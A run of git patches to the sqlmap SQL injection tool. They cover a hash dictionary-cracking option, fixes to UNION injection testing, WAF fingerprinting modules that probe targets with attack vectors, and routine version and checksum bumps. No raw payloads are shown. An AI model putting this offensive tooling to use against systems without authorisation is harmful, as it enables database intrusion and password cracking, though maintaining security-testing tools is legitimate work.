user, hash_ = line.split(':', 1) + attack_dict[user] = [hash_] + else: + attack_dict["%s%d" % (DUMMY_USER_PREFIX, i)] = [line] + i += 1 + + dictionaryAttack(attack_dict) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index b253cf02f26..f96d3655fc7 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -24,12 +24,12 @@ b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py c1bccc94522d3425a372dcd57f78418e extra/wafdetectify/wafdetectify.py 3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py 0f0feede9750be810d2b8a7ab159b7b0 lib/controller/checks.py -ad968ee04e93f6f850d6b7e5ac0073c5 lib/controller/controller.py +ae444b08253e10bc4553f011d6100b28 lib/controller/controller.py 988b548f6578adf9cec17afdeee8291c lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py e62309b22a59e60b270e62586f169441 lib/core/agent.py c347f085bd561adfa26d3a9512e5f3b9 lib/core/bigarray.py -a78c563bbaeebd958b25303d83dfe3f2 lib/core/common.py +ae4bf844c42f9a36ebbe8444e89f7041 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -3805f9f360e47798a3e6d4da977c83eb lib/core/settings.py +758c731f879a5989288d8809a8d54567 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py @@ -60,7 +60,7 @@ b35636650cfe721f5cc47fb91737c061 lib/core/update.py e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py -30d7cbada42154dcbb17f4ca969d812a lib/parse/cmdline.py +cfd7938668213fef65a7570997b78403 lib/parse/cmdline.py fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py 3794ff139869f5ae8e81cfdbe5714f56 lib/parse/handler.py 6bab53ea9d75bc9bb8169d3e8f3f149f lib/parse/headers.py @@ -108,7 +108,7 @@ f9867bbfcd6d31916ca73e72e95fd881 lib/utils/deps.py f7af65aa47329d021e2b2cc8521b42a4 lib/utils/getch.py 7af29f61302c8693cd6436d4b69e22d3 lib/utils/har.py 1205648d55649accafae2cc77d647aa0 lib/utils/hashdb.py -4b50c02e803c874c1d03873fd29d63ee lib/utils/hash.py +eb2aa3fa9ebdf4cb6ac3e005f7df1e9b lib/utils/hash.py 011d2dbf589e0faa0deca61a651239cc lib/utils/htmlentities.py 1e5532ede194ac9c083891c2f02bca93 lib/utils/__init__.py 527409077a094b63c88f3291138b1c81 lib/utils/pivotdumptable.py From c5802a5367edbcf13c10036caf8bf7638ea928ef Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 17 Dec 2018 17:43:11 +0100 Subject: [PATCH 400/428] Minor update related to the last commit --- lib/core/option.py | 4 ++++ lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 7 insertions(+), 3 deletions(-) diff --git a/lib/core/option.py b/lib/core/option.py index 13e17fdf8e7..a5c6c85a4bd 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -2437,6 +2437,10 @@ def _basicOptionValidation(): errMsg = "value for option '--union-char' must be an alpha-numeric value (e.g. 1)" raise SqlmapSyntaxException(errMsg) + if conf.hashFile and any((conf.direct, conf.url, conf.logFile, conf.bulkFile, conf.googleDork, conf.configFile, conf.requestFile, conf.updateAll, conf.smokeTest, conf.liveTest, conf.wizard, conf.dependencies, conf.purge, conf.sitemapUrl, conf.listTampers)): + errMsg = "option '--crack' should be used as a stand-alone" + raise SqlmapSyntaxException(errMsg) + if isinstance(conf.uCols, basestring): if not conf.uCols.isdigit() and ("-" not in conf.uCols or len(conf.uCols.split("-")) != 2): errMsg = "value for option '--union-cols' must be a range with hyphon " diff --git a/lib/core/settings.py b/lib/core/settings.py index ab5adcf73e2..b23bacbc82d 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.26" +VERSION = "1.2.12.27" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index f96d3655fc7..7c8f3423b5a 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -42,14 +42,14 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py 7d6edc552e08c30f4f4d49fa93b746f1 lib/core/optiondict.py -01f7cc33862b2eb2e777f5aff326e2fb lib/core/option.py +44819c32482eedd3dbf5d7c1fd108a7a lib/core/option.py c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 6783160150b4711d02c56ee2beadffdb lib/core/profiling.py 6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -758c731f879a5989288d8809a8d54567 lib/core/settings.py +e169d79e808fc6c60f8f827a18fae1bf lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py From 61e0459ec8f149a3ccd13209dbd25156b77022af Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 17 Dec 2018 17:48:22 +0100 Subject: [PATCH 401/428] Minor update --- lib/core/option.py | 2 +- lib/core/settings.py | 2 +- lib/parse/cmdline.py | 2 +- txt/checksum.md5 | 6 +++--- 4 files changed, 6 insertions(+), 6 deletions(-) diff --git a/lib/core/option.py b/lib/core/option.py index a5c6c85a4bd..23dce9cba4e 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -2438,7 +2438,7 @@ def _basicOptionValidation(): raise SqlmapSyntaxException(errMsg) if conf.hashFile and any((conf.direct, conf.url, conf.logFile, conf.bulkFile, conf.googleDork, conf.configFile, conf.requestFile, conf.updateAll, conf.smokeTest, conf.liveTest, conf.wizard, conf.dependencies, conf.purge, conf.sitemapUrl, conf.listTampers)): - errMsg = "option '--crack' should be used as a stand-alone" + errMsg = "option '--crack' should be used as a standalone" raise SqlmapSyntaxException(errMsg) if isinstance(conf.uCols, basestring): diff --git a/lib/core/settings.py b/lib/core/settings.py index b23bacbc82d..d4554b649db 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.27" +VERSION = "1.2.12.28" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index 9cc4d847cd3..9b8ec070478 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -670,7 +670,7 @@ def cmdLineParser(argv=None): # Hidden and/or experimental options parser.add_option("--crack", dest="hashFile", help=SUPPRESS_HELP) - #help="Load and crack hashes from a file") +# help="Load and crack hashes from a file (standalone)") parser.add_option("--dummy", dest="dummy", action="store_true", help=SUPPRESS_HELP) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 7c8f3423b5a..b9082425c25 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -42,14 +42,14 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py 7d6edc552e08c30f4f4d49fa93b746f1 lib/core/optiondict.py -44819c32482eedd3dbf5d7c1fd108a7a lib/core/option.py +9e12c63430c653970cbc4c6bc6984784 lib/core/option.py c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 6783160150b4711d02c56ee2beadffdb lib/core/profiling.py 6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -e169d79e808fc6c60f8f827a18fae1bf lib/core/settings.py +7bce3bb49e9a84585266da82e3a6fdb5 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py @@ -60,7 +60,7 @@ b35636650cfe721f5cc47fb91737c061 lib/core/update.py e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py -cfd7938668213fef65a7570997b78403 lib/parse/cmdline.py +0f92bdaacd8210520bdd6e0c531c70cd lib/parse/cmdline.py fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py 3794ff139869f5ae8e81cfdbe5714f56 lib/parse/handler.py 6bab53ea9d75bc9bb8169d3e8f3f149f lib/parse/headers.py From 9727f0d6910a63eac07e795e9683938f1be4c9ee Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 17 Dec 2018 22:49:09 +0100 Subject: [PATCH 402/428] Minor patch (--parse-errors with lots of HTML inside) --- lib/core/settings.py | 4 ++-- txt/checksum.md5 | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index d4554b649db..0b0edc75770 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.28" +VERSION = "1.2.12.29" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) @@ -332,7 +332,7 @@ # Regular expressions used for parsing error messages (--parse-errors) ERROR_PARSING_REGEXES = ( r"\[Microsoft\]\[ODBC SQL Server Driver\]\[SQL Server\](?P[^<]+)", - r"[^<]*(fatal|error|warning|exception)[^<]*:?\s*(?P.+?)", + r"[^<]*(fatal|error|warning|exception)[^<]*:?\s*(?P[^<]+)", r"(?m)^\s*(fatal|error|warning|exception):?\s*(?P[^\n]+?)$", r"(?P[^\n>]*SQL Syntax[^\n<]+)", r"
  • Error Type:
    (?P.+?)
    • ", diff --git a/txt/checksum.md5 b/txt/checksum.md5 index b9082425c25..83ef7466489 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -7bce3bb49e9a84585266da82e3a6fdb5 lib/core/settings.py +06d86fa6e0530b5821793d63e8351f0a lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py From daafe9b74a31f80012a4dfc8cca7003696be11df Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 17 Dec 2018 23:25:23 +0100 Subject: [PATCH 403/428] Bug fix (OR boolean based blind caused trouble to UNION with negative logic) --- lib/core/settings.py | 2 +- lib/techniques/union/test.py | 18 +++++++++++++++++- txt/checksum.md5 | 4 ++-- 3 files changed, 20 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 0b0edc75770..f6f6cdfbd48 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.29" +VERSION = "1.2.12.30" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/techniques/union/test.py b/lib/techniques/union/test.py index 591fc4f5357..6197cce432e 100644 --- a/lib/techniques/union/test.py +++ b/lib/techniques/union/test.py @@ -318,8 +318,24 @@ def unionTest(comment, place, parameter, value, prefix, suffix): if conf.direct: return + negativeLogic = kb.negativeLogic kb.technique = PAYLOAD.TECHNIQUE.UNION - validPayload, vector = _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix) + + try: + if negativeLogic: + pushValue(kb.negativeLogic) + pushValue(conf.string) + pushValue(conf.code) + + kb.negativeLogic = False + conf.string = conf.code = None + + validPayload, vector = _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix) + finally: + if negativeLogic: + conf.code = popValue() + conf.string = popValue() + kb.negativeLogic = popValue() if validPayload: validPayload = agent.removePayloadDelimiters(validPayload) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 83ef7466489..48d6a68ff7d 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -06d86fa6e0530b5821793d63e8351f0a lib/core/settings.py +5192aa6feb4e6d598ec4334c39f9ba2f lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py @@ -99,7 +99,7 @@ db208ab47de010836c6bf044e2357861 lib/techniques/blind/inference.py 686904374067047b521151301321b30a lib/techniques/error/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py -f7813cdee00df8f98d6f811475e520a1 lib/techniques/union/test.py +7047a66c35ce0c820931fc5bf73008a3 lib/techniques/union/test.py 1f2ff182a28b2baf9f9fe7477c76618d lib/techniques/union/use.py fd1ede20ec674518a54966eaf0c9f8c6 lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py From 107d9f90ad666d4963243f1a9f206c15e73a1aa8 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 17 Dec 2018 23:41:04 +0100 Subject: [PATCH 404/428] Minor message update --- lib/controller/controller.py | 3 +++ lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 6 insertions(+), 3 deletions(-) diff --git a/lib/controller/controller.py b/lib/controller/controller.py index cc9646079c7..7b5ee9ce043 100644 --- a/lib/controller/controller.py +++ b/lib/controller/controller.py @@ -642,6 +642,9 @@ def start(): errMsg += "involved (e.g. WAF) maybe you could try to use " errMsg += "option '--tamper' (e.g. '--tamper=space2comment')" + if not conf.randomAgent: + errMsg += " and/or switch '--random-agent'" + raise SqlmapNotVulnerableException(errMsg.rstrip('.')) else: # Flush the flag diff --git a/lib/core/settings.py b/lib/core/settings.py index f6f6cdfbd48..415e0f1e72a 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.30" +VERSION = "1.2.12.31" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 48d6a68ff7d..147c9efdae6 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -24,7 +24,7 @@ b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py c1bccc94522d3425a372dcd57f78418e extra/wafdetectify/wafdetectify.py 3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py 0f0feede9750be810d2b8a7ab159b7b0 lib/controller/checks.py -ae444b08253e10bc4553f011d6100b28 lib/controller/controller.py +197bdf07f8ea15ecc7e0dafea4f9ae2f lib/controller/controller.py 988b548f6578adf9cec17afdeee8291c lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py e62309b22a59e60b270e62586f169441 lib/core/agent.py @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -5192aa6feb4e6d598ec4334c39f9ba2f lib/core/settings.py +4bfede0eaaa7ad5767de41ef849de918 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py From 0c3fbc46df9a5098e05819ea12e3c9e67c3e7c14 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 18 Dec 2018 00:08:56 +0100 Subject: [PATCH 405/428] Adding Approach WAF script --- lib/core/settings.py | 2 +- txt/checksum.md5 | 3 ++- waf/approach.py | 27 +++++++++++++++++++++++++++ 3 files changed, 30 insertions(+), 2 deletions(-) create mode 100644 waf/approach.py diff --git a/lib/core/settings.py b/lib/core/settings.py index 415e0f1e72a..cc7a85a6680 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.31" +VERSION = "1.2.12.32" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 147c9efdae6..367a04d82f7 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -4bfede0eaaa7ad5767de41ef849de918 lib/core/settings.py +de90de0ae57ff593bb50dc6d150e2b7b lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py @@ -400,6 +400,7 @@ ca3ab78d6ed53b7f2c07ed2530d47efd udf/postgresql/windows/32/8.4/lib_postgresqlud 9bf2e07cdc54a661aea056223caccfb6 waf/aesecure.py a73a40d201b39f3387714c59934331e4 waf/airlock.py 7da7970b45512b0233450dbd8088fde0 waf/anquanbao.py +e33e11d4a8a91ade0561bb65d4d33bc6 waf/approach.py b61329e8f8bdbf5625f9520ec010af1f waf/armor.py 2fe5335fde7a7f5b19d2f363a55ce805 waf/asm.py 6ea7b4ff5f111acb0b24186ef82c3f2d waf/aws.py diff --git a/waf/approach.py b/waf/approach.py new file mode 100644 index 00000000000..1077e0b673d --- /dev/null +++ b/waf/approach.py @@ -0,0 +1,27 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import re + +from lib.core.enums import HTTP_HEADER +from lib.core.settings import WAF_ATTACK_VECTORS + +__product__ = "Approach Web Application Firewall (Approach)" + +def detect(get_page): + retval = False + + for vector in WAF_ATTACK_VECTORS: + page, headers, code = get_page(get=vector) + retval = re.search(r"Approach Web Application Firewall", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None + retval |= re.search(r"Approach()? Web Application Firewall", page or "", re.I) is not None + retval |= " Your IP address has been logged and this information could be used by authorities to track you." in (page or "") + retval |= all(_ in (page or "") for _ in ("Sorry for the inconvenience!", "If this was an legitimate request please contact us with details!")) + if retval: + break + + return retval From 4c9e0b9f1e1a364477961a42542454f77c1560e9 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 18 Dec 2018 00:35:08 +0100 Subject: [PATCH 406/428] Adding Bluedon WAF script --- lib/core/settings.py | 2 +- txt/checksum.md5 | 3 ++- waf/bluedon.py | 25 +++++++++++++++++++++++++ 3 files changed, 28 insertions(+), 2 deletions(-) create mode 100644 waf/bluedon.py diff --git a/lib/core/settings.py b/lib/core/settings.py index cc7a85a6680..40144c80189 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.32" +VERSION = "1.2.12.33" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 367a04d82f7..f7a08957ac0 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -de90de0ae57ff593bb50dc6d150e2b7b lib/core/settings.py +43eec1a3d017f1d440b89e9ecf3f2ff8 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py @@ -409,6 +409,7 @@ ef722d062564def381b1f96f5faadee3 waf/baidu.py 44f724ab7d333397975fecdf7e50be56 waf/bigip.py 6a2834daf767491d3331bd31e946d540 waf/binarysec.py 41e399dbfe7b904d5aacfb37d85e1fbf waf/blockdos.py +6d505434a13365cbe3b01f912ea36a44 waf/bluedon.py c52c6974c0dae6815f27cfdee6121d7b waf/chinacache.py 2f3bbf43be94d4e9ffe9f80e8483d62f waf/ciscoacexml.py ba84f296cb52f5e78a0670b98d7763fa waf/cloudbric.py diff --git a/waf/bluedon.py b/waf/bluedon.py new file mode 100644 index 00000000000..678f5e423e6 --- /dev/null +++ b/waf/bluedon.py @@ -0,0 +1,25 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import re + +from lib.core.enums import HTTP_HEADER +from lib.core.settings import WAF_ATTACK_VECTORS + +__product__ = "Bluedon Web Application Firewall (Bluedon Information Security Technology)" + +def detect(get_page): + retval = False + + for vector in WAF_ATTACK_VECTORS: + page, headers, code = get_page(get=vector) + retval = re.search(r"BDWAF", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None + retval |= re.search(r"Bluedon Web Application Firewall", page or "", re.I) is not None + if retval: + break + + return retval From a007cd30e5270ffff23cb7af745c07d9afd2bc47 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 19 Dec 2018 11:11:56 +0100 Subject: [PATCH 407/428] Fixes #3412 --- lib/core/common.py | 14 +++++++++----- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 12 insertions(+), 8 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index d0fd775b8b0..6291297c77b 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -3659,11 +3659,15 @@ def safeSQLIdentificatorNaming(name, isTable=False): elif Backend.getIdentifiedDbms() in (DBMS.ORACLE,): retVal = "\"%s\"" % retVal.upper() elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE): - parts = retVal.split('.', 1) - for i in xrange(len(parts)): - if ((parts[i] or " ")[0].isdigit() or not re.match(r"\A\w+\Z", parts[i], re.U)): - parts[i] = "[%s]" % parts[i] - retVal = '.'.join(parts) + if isTable: + parts = retVal.split('.', 1) + for i in xrange(len(parts)): + if parts[i] and (re.search(r"\A\d|[^\w]", parts[i], re.U) or parts[i].upper() in kb.keywords): + parts[i] = "[%s]" % parts[i] + retVal = '.'.join(parts) + else: + if re.search(r"\A\d|[^\w]", retVal, re.U) or retVal.upper() in kb.keywords: + retVal = "[%s]" % retVal if _ and DEFAULT_MSSQL_SCHEMA not in retVal and '.' not in re.sub(r"\[[^]]+\]", "", retVal): retVal = "%s.%s" % (DEFAULT_MSSQL_SCHEMA, retVal) diff --git a/lib/core/settings.py b/lib/core/settings.py index 40144c80189..8e50c85b531 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.33" +VERSION = "1.2.12.34" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index f7a08957ac0..606401622d9 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -29,7 +29,7 @@ c1bccc94522d3425a372dcd57f78418e extra/wafdetectify/wafdetectify.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py e62309b22a59e60b270e62586f169441 lib/core/agent.py c347f085bd561adfa26d3a9512e5f3b9 lib/core/bigarray.py -ae4bf844c42f9a36ebbe8444e89f7041 lib/core/common.py +22eb6444f89ef013cd256c92771cff5a lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -43eec1a3d017f1d440b89e9ecf3f2ff8 lib/core/settings.py +16ba53ca22bb764b6cdee725ffe41618 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py From 5e099144d305720bd84dde8a069369f25e4b83cc Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 21 Dec 2018 10:38:27 +0100 Subject: [PATCH 408/428] Minor message update --- lib/core/settings.py | 2 +- sqlmap.py | 5 +++-- txt/checksum.md5 | 4 ++-- 3 files changed, 6 insertions(+), 5 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 8e50c85b531..70c2280a578 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.34" +VERSION = "1.2.12.35" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/sqlmap.py b/sqlmap.py index f5e592b0f66..9d9272eabd7 100755 --- a/sqlmap.py +++ b/sqlmap.py @@ -171,8 +171,9 @@ def main(): raise except SqlmapUserQuitException: - errMsg = "user quit" - logger.error(errMsg) + if not conf.batch: + errMsg = "user quit" + logger.error(errMsg) except (SqlmapSilentQuitException, bdb.BdbQuit): pass diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 606401622d9..31c3ac8d3cc 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ 